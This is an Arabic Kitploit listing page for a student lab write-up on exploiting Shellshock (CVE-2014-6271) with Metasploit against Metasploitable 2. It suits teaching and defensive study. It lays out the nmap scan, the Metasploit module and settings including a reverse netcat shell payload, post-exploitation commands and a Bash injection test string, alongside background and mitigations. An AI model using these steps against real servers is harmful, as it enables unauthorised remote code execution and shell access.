Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Shellshock-CVE-2014-6271-Exploitation-and-Analysis — مختبر تعليمي يوضح استغلال ثغرة Shellshock (CVE-2014-6271) باستخدام Metasploit ضد Metasploitable 2، بما في ذلك الفحص والاستغلال والصدفة العكسية واستراتيجيات التخفيف. | Kitploit
أدوات/GitHubGitHub/rajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubrajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis

Shellshock-CVE-2014-6271-Exploitation-and-Analysis

مختبر تعليمي يوضح استغلال ثغرة Shellshock (CVE-2014-6271) باستخدام Metasploit ضد Metasploitable 2، بما في ذلك الفحص والاستغلال والصدفة العكسية واستراتيجيات التخفيف.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🐚 شيلشوك (CVE-2014-6271) – الاستغلال والتحليل

📌 نظرة عامة

هذا هو التكليف العملي لمادة تقييم الثغرات واختبار الاختراق – الجزء الثاني، مع التركيز على استغلال وتحليل ثغرة شيلشوك (CVE-2014-6271).
تم إجراؤه في بيئة معملية خاضعة للرقابة باستخدام Metasploitable 2 (الهدف) و Kali Linux (المهاجم).


🛠 الأدوات المستخدمة

  • 💻 Kali Linux – جهاز المهاجم
  • 🖥 Metasploitable 2 – الهدف الضعيف
  • 🔍 Nmap – المسح واكتشاف الخدمات
  • 🎯 Metasploit Framework – الاستغلال

🔍 ملخص الثغرة

  • النوع: تنفيذ كود عن بُعد (RCE)
  • المكوّن المتأثر: GNU Bash (الإصدارات 1.14–4.3)
  • التأثير: تنفيذ أوامر تعسفية عبر متغيرات بيئة مصممة خصيصًا
  • درجة CVSS: 10.0 (حرجة)
  • ناقل الاستغلال: غالبًا عبر رؤوس HTTP إلى نصوص CGI

⚡ خطوات المختبر

1️⃣ مسح الهدف

root@kitploit:~
 nmap -sS -sV <target-ip>

2️⃣ بدء Metasploit msfconsole

3️⃣ تحميل وحدة الاستغلال use exploit/multi/http/apache_mod_cgi_bash_env_exec

4️⃣ تكوين الاستغلال

root@kitploit:~
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat

5️⃣ تشغيل الاستغلال exploit

📸 العرض التوضيحي يشمل

root@kitploit:~
📡 نتائج مسح Nmap

⚙️ تكوين Metasploit

🔄 مخرجات جلسة الصدفة العكسية

🛠 أوامر ما بعد الاستغلال:

whoami
uname -a
ifconfig

📖 الخلفية النظرية ما هو شيلشوك؟

شيلشوك هي ثغرة في صدفة GNU Bash تسمح للمهاجمين بتنفيذ أوامر تعسفية عن طريق حقنها في متغيرات البيئة. تم اكتشافها في سبتمبر 2014 وأُسند إليها CVE-2014-6271، وهي تؤثر على Bash من الإصدار 1.14 إلى 4.3. كيف تعمل

تقوم Bash بمعالجة تعريفات الدوال في متغيرات البيئة بشكل غير صحيح وتنفيذ أوامر إضافية بعد نص الدالة. في خوادم الويب التي تستخدم نصوص CGI، تصبح رؤوس HTTP متغيرات بيئة، مما يخلق مسار هجوم سهل.

مثال:

env x='() { :;}; echo vulnerable' bash -c "echo test"

إذا كانت ضعيفة، فإنها تطبع vulnerable. التأثير

root@kitploit:~
تنفيذ كود عن بُعد كامل (RCE) دون مصادقة

قابلة للاستغلال عبر طلبات HTTP بسيطة

مُستخدمة في شبكات الروبوتات (botnets)، الديدان، الهجمات المستهدفة

أثرت على ملايين الخوادم، أجهزة التوجيه، وأجهزة إنترنت الأشياء

استغلالات في العالم الحقيقي

root@kitploit:~
خوادم Yahoo – برمجيات خبيثة عبر نصوص CGI

شبكة الروبوتات Wopbot – استغلال آلي

QNAP NAS – وصول صدفة عن بُعد وبرمجيات خبيثة

ديدان ذاتية التكاثر – الانتشار إلى مضيفين جدد ضعفاء

🛡 الوقاية والتخفيف

root@kitploit:~
🔄 تحديث Bash فورًا

🚫 تعطيل نصوص CGI غير المستخدمة

🔥 استخدام جدران الحماية لحظر حركة المرور غير الضرورية

🛡 نشر جدران حماية تطبيقات الويب (WAF)

📜 مراقبة سجلات طلبات HTTP

👤 تطبيق مبادئ الامتياز الأقل

⚠️ إخلاء مسؤولية

هذا المشروع لأغراض تعليمية فقط. تم إجراء جميع الاختبارات في بيئة معملية خاضعة للرقابة. ❌ لا تستخدم هذه التقنيات على أنظمة دون إذن.

👨‍💻 المؤلف: Janith Madhusankha 🎓 الدورة: BICT (Hons) في الشبكات والأمن 🏫 المؤسسة: South Eastern University of Sri Lanka

تنزيل الأداة